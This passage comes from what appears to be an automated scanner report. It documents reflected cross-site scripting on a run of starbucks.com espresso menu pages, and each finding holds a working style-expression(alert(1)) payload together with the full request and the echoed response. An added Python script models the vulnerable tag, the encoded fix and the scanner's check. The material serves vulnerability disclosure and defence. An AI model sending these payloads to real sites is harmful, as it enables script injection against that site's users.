Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:06 GMT
Connection: close
Content-Length: 43144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/eggnog-latte?5fbe1"style="x:expression(alert(1))"947cd8ab9f7=1"/>
...[SNIP]...

2.116. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-con-panna

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 308a1"style="x:expression(alert(1))"67cfbbd6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/espresso-con-panna?308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:10 GMT
Connection: close
Content-Length: 42380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna?308a1"style="x:expression(alert(1))"67cfbbd6d45=1"/>
...[SNIP]...

2.117. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fec3e"style="x:expression(alert(1))"7a8ae9aecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/espresso-macchiato?fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:13 GMT
Connection: close
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato?fec3e"style="x:expression(alert(1))"7a8ae9aecf=1"/>
...[SNIP]...

2.118. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-shot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1525"style="x:expression(alert(1))"c72de6024ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/espresso-shot?c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:07 GMT
Connection: close
Content-Length: 42260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-shot?c1525"style="x:expression(alert(1))"c72de6024ef=1"/>
...[SNIP]...

2.119. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dceb"style="x:expression(alert(1))"01f34e806e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/flavored-latte?5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:40 GMT
Connection: close
Content-Length: 42615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/flavored-latte?5dceb"style="x:expression(alert(1))"01f34e806e=1"/>
...[SNIP]...

2.120. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/gingerbread-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb272"style="x:expression(alert(1))"511c9e6d392 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/gingerbread-latte?fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:15 GMT
Connection: close
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte?fb272"style="x:expression(alert(1))"511c9e6d392=1"/>
...[SNIP]...

2.121. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-americano

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b26f3"style="x:expression(alert(1))"5d8d8ff815a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-americano?b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:51 GMT
Connection: close
Content-Length: 42566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano?b26f3"style="x:expression(alert(1))"5d8d8ff815a=1"/>
...[SNIP]...
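
The findings in this section all share one sink and one payload shape: a request parameter name is copied, unencoded, into the double-quoted content attribute of the og:url meta tag. The following Python script is an added illustration, not part of the XSS.CX report and not starbucks.com's code. It models the assumed server-side construction of that tag from the raw request target, the hardened form that HTML-encodes the attribute value, and the confirmation check a scanner performs (exact echo present, and the injected style= value parsed as its own attribute of the tag). The path and canary values are taken from finding 2.121; the server behaviour (a single percent-decode of the query, then string interpolation) is an assumption, as are all function names.

```python
"""Added example, not part of the XSS.CX report or of starbucks.com's code.

Models the reflection the report describes: a request-parameter *name* is
copied into the double-quoted content attribute of the og:url <meta> tag
without HTML encoding, so a name containing a double quote closes the
attribute and injects style="x:expression(alert(1))" (CSS expression() is
evaluated only by legacy Internet Explorer).

Assumptions (not from the report): the server percent-decodes the query once
and interpolates the request target into the tag; the hardened variant uses
standard HTML attribute encoding; the scanner confirms the issue only when
the injected style= value parses as a separate attribute.
"""
import re
import secrets
from html import escape
from urllib.parse import unquote

HOST = "http://www.starbucks.com"
# Attribute tokenizer: name, '=', double-quoted value (what a browser sees)
ATTR_RE = re.compile(r'([^\s"\'>/=]+)\s*=\s*"([^"]*)"')
TAG_RE = re.compile(r"<[^>]*>")


def make_payload(prefix: str = "", suffix: str = ""):
    """Build the scanner's canary payload and the echo it expects back.

    The random prefix/suffix make the reflection unambiguous; %3d and %3a are
    URL-encoded '=' and ':' so the query string still parses as one parameter.
    """
    prefix = prefix or secrets.token_hex(3)[:5]    # 5 hex chars, e.g. b26f3
    suffix = suffix or secrets.token_hex(6)[:11]   # 11 hex chars, e.g. 5d8d8ff815a
    param_name = f'{prefix}"style%3d"x%3aexpression(alert(1))"{suffix}'
    expected_echo = f'{prefix}"style="x:expression(alert(1))"{suffix}'
    return param_name, expected_echo


def og_url_tag_vulnerable(request_target: str) -> str:
    """Vulnerable (assumed): raw request target interpolated into a quoted attribute."""
    return f'<meta property="og:url" content="{HOST}{request_target}"/>'


def og_url_tag_hardened(request_target: str) -> str:
    """Fixed: HTML-encode the value so '"' becomes &quot; and cannot close the attribute."""
    return f'<meta property="og:url" content="{escape(HOST + request_target, quote=True)}"/>'


def simulate_request(path: str, param_name: str, build_tag) -> str:
    """Stand-in for the server: one round of percent-decoding on the query,
    then the og:url tag is rendered by build_tag."""
    request_target = f"{path}?{unquote(param_name)}=1"
    return build_tag(request_target)


def tag_containing(html: str, needle: str):
    """Return the first tag whose source text contains needle, or None."""
    for m in TAG_RE.finditer(html):
        if needle in m.group(0):
            return m.group(0)
    return None


def parse_attributes(tag_html: str) -> dict:
    """Attributes a browser would see on the first tag in tag_html."""
    tag = TAG_RE.search(tag_html)
    return dict(ATTR_RE.findall(tag.group(0))) if tag else {}


def reflected_in_attribute(response_html: str, expected_echo: str) -> bool:
    """Scanner confirmation: the exact unencoded echo is present, and the
    injected style= value is parsed as its own attribute rather than staying
    inside the original content value."""
    tag = tag_containing(response_html, expected_echo)
    return tag is not None and parse_attributes(tag).get("style") == "x:expression(alert(1))"


if __name__ == "__main__":
    # Path and canary values from finding 2.121 in the report
    path = "/menu/drinks/espresso/iced-caffe-americano"
    param, echo = make_payload("b26f3", "5d8d8ff815a")
    for name, builder in (("vulnerable", og_url_tag_vulnerable), ("hardened", og_url_tag_hardened)):
        html = simulate_request(path, param, builder)
        print(f"{name}: {html}")
        print(f"  XSS confirmed: {reflected_in_attribute(html, echo)}")
```

Only the expression() payload is Internet Explorer specific; the defect the script isolates is the unencoded double quote, which in the same position would also accept an event-handler attribute on browsers that never supported CSS expressions. The fix is therefore context-appropriate output encoding of the attribute value (as in og_url_tag_hardened), not a blocklist for the word expression.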

2.122. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a85b"style="x:expression(alert(1))"5c1bfe82ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-latte?2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:24 GMT
Connection: close
Content-Length: 42746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte?2a85b"style="x:expression(alert(1))"5c1bfe82ef3=1"/>
...[SNIP]...

2.123. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as feb2c"style="x:expression(alert(1))"fb386894d81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caffe-mocha?feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:08 GMT
Connection: close
Content-Length: 42988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha?feb2c"style="x:expression(alert(1))"fb386894d81=1"/>
...[SNIP]...

2.124. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7963d"style="x:expression(alert(1))"1846f5f581e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-caramel-macchiato?7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:15 GMT
Connection: close
Content-Length: 42903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato?7963d"style="x:expression(alert(1))"1846f5f581e=1"/>
...[SNIP]...

2.125. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80403"style%3d"x%3aexpression(alert(1))"2617616deb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80403"style="x:expression(alert(1))"2617616deb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style%3d"x%3aexpression(alert(1))"2617616deb8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:50 GMT
Connection: close
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style="x:expression(alert(1))"2617616deb8=1"/>
...[SNIP]...

2.126. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a2e21"style="x:expression(alert(1))"78381d7a361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-flavored-latte?a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:51 GMT
Connection: close
Content-Length: 42981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte?a2e21"style="x:expression(alert(1))"78381d7a361=1"/>
...[SNIP]...

2.127. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-gingerbread-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15bbb"style="x:expression(alert(1))"b07d6033aae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-gingerbread-latte?15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:50 GMT
Connection: close
Content-Length: 43417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte?15bbb"style="x:expression(alert(1))"b07d6033aae=1"/>
...[SNIP]...

2.128. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-mocha

Issue detail

